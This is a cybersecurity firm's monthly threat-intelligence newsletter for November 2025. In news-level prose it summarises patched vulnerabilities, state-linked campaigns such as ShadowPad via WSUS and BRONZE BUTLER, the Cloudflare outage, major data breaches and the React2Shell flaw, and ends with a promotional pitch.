Threat Pulse – November 2025

Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats.

If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.

DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the most comprehensive Threat Intelligence and Open Threat Exchange databases available worldwide.

Cyber Incidents in November 

Microsoft Vulnerabilities Identified in November 2025 

In November 2025, Microsoft patched 63 vulnerabilities across Windows, Office, and related products, including five Critical issues and a zero-day (CVE-2025-62215) that was actively exploited to gain SYSTEM level privileges via a Windows kernel flaw. The update also fixed multiple remote code execution vulnerabilities in components such as GDI+ and Microsoft Office, alongside numerous elevation-of-privilege bugs affecting Windows drivers, graphics subsystems, Bluetooth, WinSock, and task-scheduler services.  

Because these vulnerabilities affected core OS components and widely used enterprise software, Microsoft urged rapid patching to mitigate risks of exploitation, privilege escalation, remote execution attacks, and data exposure. 

BRONZE BUTLER exploits Japanese asset management software vulnerability 

The Sophos Counter Threat Unit (CTU) has uncovered a sophisticated cyber campaign by the Chinese state-sponsored group BRONZE BUTLER (also known as Tick), targeting a zero-day vulnerability (CVE-2025-61932) in Japan’s Motex LANSCOPE Endpoint Manager. This flaw allows remote command execution with SYSTEM privileges, enabling attackers to escalate privileges and move laterally within compromised networks. The group deployed updated variants of the Gokcpdoor malware, which now use multiplexed communication and serve both client and server roles for command and control (C2) operations.  

In some cases, they also used the Havoc C2 framework and OAED Loader to obfuscate execution. Legitimate tools like goddi, remote desktop, and 7-Zip were abused for data exfiltration, with cloud services such as file.io and LimeWire accessed during attacks. CTU recommends patching vulnerable systems and reviewing exposure of internet-facing LANSCOPE servers. Sophos has released detection signatures and indicators to help identify related malicious activity. 

Global Internet Disruption Caused by Cloudflare Outage 

On 18 November 2025, Cloudflare suffered a major global outage that disrupted large parts of the internet for several hours. What began as a routine internal change to database permissions inadvertently caused a cascade of failures: a query used by Cloudflare’s bot-management system returned duplicate entries, which generated an abnormally large “feature file.” When that oversized file was propagated across Cloudflare’s global network, edge servers hit a hard-coded limit and “panicked,” leading them to crash and return widespread HTTP 5xx errors.  

As a result, many popular websites and services — including social media platforms, AI tools, streaming, games, e-commerce and more — became unavailable or unreliable for users worldwide. The disruption lasted roughly five and a half hours, with partial recovery starting early in the outage and full restoration confirmed only later in the day. Cloudflare said the outage was not caused by a cyberattack but by an internal configuration error, and the company later apologised for the disruption. 

Beyond the immediate blackouts, the incident sparked broader concerns over the fragility and centralisation of internet infrastructure — especially how much of the web depends on a small number of providers like Cloudflare. 

Amazon Web Services (AWS) – November 2025 Vulnerabilities 

In November 2025, AWS published several key security advisories addressing multiple runC container escape vulnerabilities (CVE-2025-31133, CVE-2025-52565, CVE-2025-52881) that affected AWS containerized services such as Amazon SageMaker. These flaws could allow container breakout if unpatched.  

AWS also disclosed CVE-2025-12779 on November 5th, affecting the Amazon WorkSpaces Linux client, where improper token handling created the potential for local privilege escalation. Updated images and client versions were released to mitigate these risks.  

MS Teams Guest Access Can Remove Defender Protection When Users Join External Tenants 

A critical security gap in Microsoft Teams has been found that allows attackers to bypass Microsoft Defender for Office 365 protections through the guest access feature. When users join external tenants as guests, their security is governed by the hosting environment rather than their home organization.  

This creates a blind spot where attackers can exploit the feature by setting up malicious tenants with minimal security controls, such as those using low-cost licenses without Defender protections. Once a victim accepts an invitation, all subsequent communication occurs within the attacker’s tenant, enabling phishing or malware distribution without triggering the victim’s organization’s security measures. 

The risk is compounded by Microsoft’s new feature that enables Teams users to chat with anyone via email, expanding external collaboration but also increasing exposure to untrusted environments. Since invitations originate from Microsoft infrastructure, they bypass email security checks like SPF, DKIM, and DMARC, making detection difficult.  

To mitigate these threats, organizations are advised to restrict guest invitations to trusted domains, enforce cross-tenant access controls, disable external Teams communication if unnecessary, and educate users about unsolicited invites. This issue underscores the need for stronger safeguards in cross-tenant collaboration scenarios. 

ShadowPad Malware Exploits WSUS Vulnerability 

Threat actors have recently exploited a critical flaw in Microsoft Windows Server Update (WSUS), tracked as CVE-2025-59287, in order to deliver the ShadowPad backdoor. ShadowPad, assessed to be a successor to PlugX, is a modular backdoor widely used by Chinese state-sponsored hacking groups.  

The recently patched vulnerability has quickly come under heavy usage, allowing threat actors to achieve remote code execution with system-level privileges. Threat actors have already used it to obtain initial access to publicly exposed WSUS instances, and conduct reconnaissance.  

The vulnerability is exploited using utilities such as “curl.exe” and “certutil.exe” to gain a system shell, these utilities are exploited to download ShadowPad from an external server, which is then launched via DLL side-loading through legitimate binaries like “ETDCtrlHelper.exe”. Once installed, the malware is designed to launch a core module that’s responsible for loading other plugins embedded in the shellcode into memory. 

Matrix Push C2 Uses Browser Notifications for Fileless, Cross-Platform Phishing Attacks 

Matrix Push C2 is a newly discovered “fileless” command‑and‑control platform that exploits standard browser push notifications to carry out phishing and malware attacks. Once a user is tricked into allowing notifications from a malicious or compromised website, the attacker can send fake alerts that appear to come from legitimate services, such as warnings about suspicious logins or browser updates.  

Clicking on these notifications redirects the victim to phishing pages or sites hosting malware, all without requiring an initial file download. Because it operates through the browser, the attack works across multiple operating systems, including Windows, macOS, Linux, and mobile devices. Attackers use a web-based dashboard to manage campaigns, track which users click notifications, monitor active browsers, manage shortened malicious links, and even detect installed browser extensions like crypto wallets.  

What makes Matrix Push C2 particularly dangerous is that it abuses a trusted browser feature, requires no files to be downloaded, works across platforms, and gives attackers persistent, stealthy access, effectively turning ordinary web browsers into covert attack entry points. 

Researchers Uncover BankBot-YNRK and DeliveryRAT Android Trojans Stealing Financial Data 

Cybersecurity researchers have shed light on two different Android trojans called BankBot-YNRK and DeliveryRAT that are capable of harvesting sensitive data from compromised devices. 

The malware incorporates features to sidestep analysis efforts by first checking its running within a virtualised or emulated environment, and then extracting device details such as the manufacturer and model name to ascertain if it’s being executed on a real device. 

OpenAI / Mixpanel Data Exposure via Smishing-Driven Breach 

On 8 November 2025, Mixpanel is an analytics provider used by OpenAI who suffered a breach after attackers carried out a smishing (phishing via text-message) campaign. The attackers accessed and exported customer metadata and analytics logs tied to OpenAI’s API users, exposing data such as names, email addresses, approximate location, and browser/OS details. 

OpenAI clarified that its core systems were not compromised: API keys, payment data, authentication tokens, user prompts and chat or API logs remained secure. However, the exposed metadata could still be used to launch phishing or social-engineering attacks against affected users. OpenAI promptly removed Mixpanel from production and began notifying impacted users. 

GE (GE Vernova) – Smallworld GIS improper authentication (CVE-2025-3222) 

On 7 November 2025, CVE-2025-3222 was published for GE Vernova Smallworld (a GIS platform), describing a critical Improper Authentication vulnerability affecting Smallworld 5.3.3 and earlier on Linux and 5.3.4 and earlier on Windows.  

The flaw allows network-based authentication abuse without any prior privileges or user interaction, letting a remote attacker bypass authentication and potentially gain high-impact access to the system. The issue carries a CVSS v4.0 score of 9.3 (Critical) and is tracked with an official GE advisory, which provides mitigation and upgrade guidance. 

SitusAMC Data Breach – Real-Estate Finance Software Vendor Compromised 

On 12 November 2025, SitusAMC, a major US-based technology and services provider for commercial and residential real-estate finance (supporting mortgage lenders, property investors, real-estate loans origination and servicing), confirmed that its systems were breached. The attack did not involve ransomware or file-encryption, rather, it was a data-exfiltration breach.  

According to the company, accounting records, legal agreements tied to client relationships, and “in some cases” data relating to the clients’ customers (including residential-mortgage borrowers) may have been exposed. Banks and major financial institutions that use SitusAMC’s services, including firms involved in real estate lending, reportedly scrambled to assess the potential exposure among their customers and the scope of stolen data.  

As of the latest public update (late November), the breach was contained, operations had been restored, and an investigation by law-enforcement and cyber security experts was underway. The incident highlights the growing risk posed by third-party vendors in the real-estate ecosystem: a compromise at a single software/finance service provider can cascade into exposure for many lenders, borrowers, and property finance customers. 

French Football Federation (FFF) – Member-Data Breach via Compromised Admin Account 

In late November 2025, the French Football Federation disclosed that it had suffered a cyberattack on its club management software, resulting in unauthorised access and theft of personal data belonging to its members and licence holders. 

The stolen information reportedly includes full names, gender, nationality, membership or licence numbers, postal and email addresses, though no banking data or passwords were said to be exposed. 

The breach was carried out using a compromised privileged account rather than exploiting a software vulnerability, underlining how human-factor weaknesses (e.g. credential theft or phishing) remain a major threat to sports organisations’ data security. 

Synnovis / NHS England — Historic Pathology-Supplier Attack  

In early November 2025, the pathology supplier Synnovis, which supports multiple NHS hospitals, GP practises and clinics, had concluded its forensic investigation into a ransomware attack originally carried out in June 2024. The stolen data, including names, NHS numbers and blood-test results, was published online. By 21 November 2025, Synnovis finished notifying affected organisations, which are now assessing the risk and contacting potentially impacted patients as required.

While the active disruption to laboratory services has long since ended, this notification marks a delayed but important escalation, highlighting long-term patient privacy and data-security consequences of earlier attacks.

Rising Regulatory Pressure in UK After November Cyber-Threat Surge 

On 12 November 2025, the UK government unveiled proposed legislation — the Cyber Security and Resilience Bill which aimed at strengthening cyber defences for essential services including healthcare, energy, water and transport.  

Under the bill, medium and large third-party IT / managed service vendors that supply to organisations like the NHS would now be subject to duty-of-care obligations: they must rapidly report any “significant or potentially significant” cyber incidents, implement robust baseline security measures, and be held accountable for non-compliance. 

Coordinated Cyber-Attack on London Councils 

In late November 2025, a coordinated cyber-attack struck multiple London boroughs: Kensington & Chelsea, Westminster, and Hammersmith & Fulham (and reports suggest other councils sharing IT infrastructure may also be affected).

The attack disrupted key public services, including phone lines and council IT systems, prompting the affected councils to shut down certain systems as a precaution, activate emergency response plans and engage with the National Cyber Security Centre (NCSC) and law-enforcement for investigation.

By early December, the councils confirmed that evidence showed some data had been copied from their systems. While they stated much of it was “historical data,” they acknowledged the possibility that personal or financial records could be involved, and warned residents to be vigilant.

This incident highlights the risk posed by shared infrastructure among public bodies: experts suggest the attackers may have exploited a common managed-service provider or shared-services arrangement, underlining how such models, while cost-efficient, can create a single point of failure. 

Ransomware Incident at LG Energy Solution Subsidiary 

In mid-November 2025, LG Energy Solution confirmed a ransomware incident affecting one of its overseas facilities. Attackers claimed to have stolen around 1.7 TB of employee and corporate data.  

Although production was reportedly restored, the breach highlights how energy sector firms, including battery manufacturers, renewable energy suppliers, or energy tech firms, will remain attractive ransomware targets, especially those with global supply-chains and distributed operations. 

Water Utilities in the UK Report New Cyber Incidents  

As of early November 2025, the Drinking Water Inspectorate (DWI) in the UK confirmed that several drinking-water suppliers have reported cyber-attacks (or intrusions) since the start of 2024, with some incidents still being logged under newly introduced regulatory scrutiny. Many of these intrusions involved “out-of-scope systems” under current regulations, they didn’t automatically trigger formal public disclosure.  

Nonetheless, the DWI data shows that water utilities remain under active threat, reinforcing that cyber-risks in the utilities sector often operate quietly, not always in headline-making ways.  

The pattern also highlights a regulatory gap: many smaller utility firms may detect signs of intrusion (compromised credentials, weird network activity), but do not yet report them, meaning the scope of the risk may be significantly undercounted. 

Coupang Mega Data Breach — South Korea 

E-commerce giant Coupang confirmed a breach impacting roughly 33.7 million customer accounts in November. The incident stemmed from compromised signing keys that had not been rotated, allowing attackers persistent access to internal systems. The exposed data included sensitive user information, triggering investigations and executive fallout.  

Impact: 

• Nearly the entire active user base was affected. 
• Highlights the ongoing risk of inadequate key management and access controls. 

Balancer DeFi Protocol Hack — Crypto Theft 

Attackers targeted the Balancer decentralized finance (DeFi) protocol, exploiting logic flaws to drain more than $120 million in crypto assets. The exploit showcased the persistent risk to blockchain and smart-contract ecosystems, particularly where composability and liquidity mechanics can be abused.  

Salesforce Token Abuse & Gainsight Incident 

A widespread Salesforce access token compromise allowed threat actors to gain unauthorized access across numerous customer environments, particularly via integrations with CRM and customer success platforms like Gainsight.  

Impact: 

• Potential customer data exposure across multi-tenant SaaS systems. 
• Reinforces the importance of strong token rotation, MFA, and least-privilege access. 

Miljödata & Eurofiber Breaches — Data Exposure and Extortion Attempts 

Swedish IT provider Miljödata suffered a breach that exposed sensitive records of 1.5 million individuals, with exfiltrated data published on dark web sites. European network operator Eurofiber experienced a hack where attackers accessed its systems, exfiltrated customer information, and attempted extortion.  

Impact: 

• Third-party service providers remain attractive targets due to the data aggregation effect across municipalities and enterprise clients. 

React2Shell Vulnerability: Massive Exploitation in the Wild 

Critical RCE Bug in React Server Components (CVE-2025-55182) 

A zero-day critical remote code execution vulnerability affecting React Server Components (dubbed React2Shell) was publicly disclosed on 3 December 2025. The flaw allows unauthenticated attackers to execute arbitrary code on vulnerable servers by exploiting insecure deserialization in the React “Flight” protocol. Affected frameworks include React 19.x and downstream implementations such as Next.js 15.x and 16.x using App Router.  

In-The-Wild Exploitation and Real Attacks 

Security researchers have observed dozens of confirmed exploitation cases, as attackers scramble to weaponize React2Shell: 

• Automated attacks against vulnerable internet-facing React/Next.js applications have already been confirmed, with more than 50 victims identified globally.  
• Exploit kits and early malware payloads are delivering crypto miners and multiple new malware families via this flaw across sectors — notably construction and entertainment — demonstrating diverse attacker objectives.  
• North Korea-linked threat actors have exploited React2Shell to deploy a new remote access trojan named EtherRAT, showing how state-aligned groups pursue strategic compromises.  
• Chinese state-nexus groups, including Earth Lamia and Jackpot Panda, launched exploitation campaigns within hours of the vulnerability’s disclosure, targeting financial, retail, logistics, education and government infrastructures.  
• Intelligence indicates ongoing active scanning and exploitation by multiple Chinese threat clusters, prompting urgent mitigation advisories from major cloud and security vendors.  

Impact Patterns 

React2Shell exploitation has enabled attackers to: 

• Establish unauthorised shells on compromised servers; 
• Harvest credentials and cloud metadata; 
• Install cryptomining infrastructure and backdoor implants; 
• Integrate into botnets or persistent access tooling.  

Takeaway 

The speed and breadth of React2Shell weaponization (from zero-day disclosure to widespread exploitation) underscores the need for immediate patching and defensive scanning in affected environments.  

DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service means we can take care of your security, while you take care of business.

Talk to the team to see how you can start protecting your business against cyberattacks today.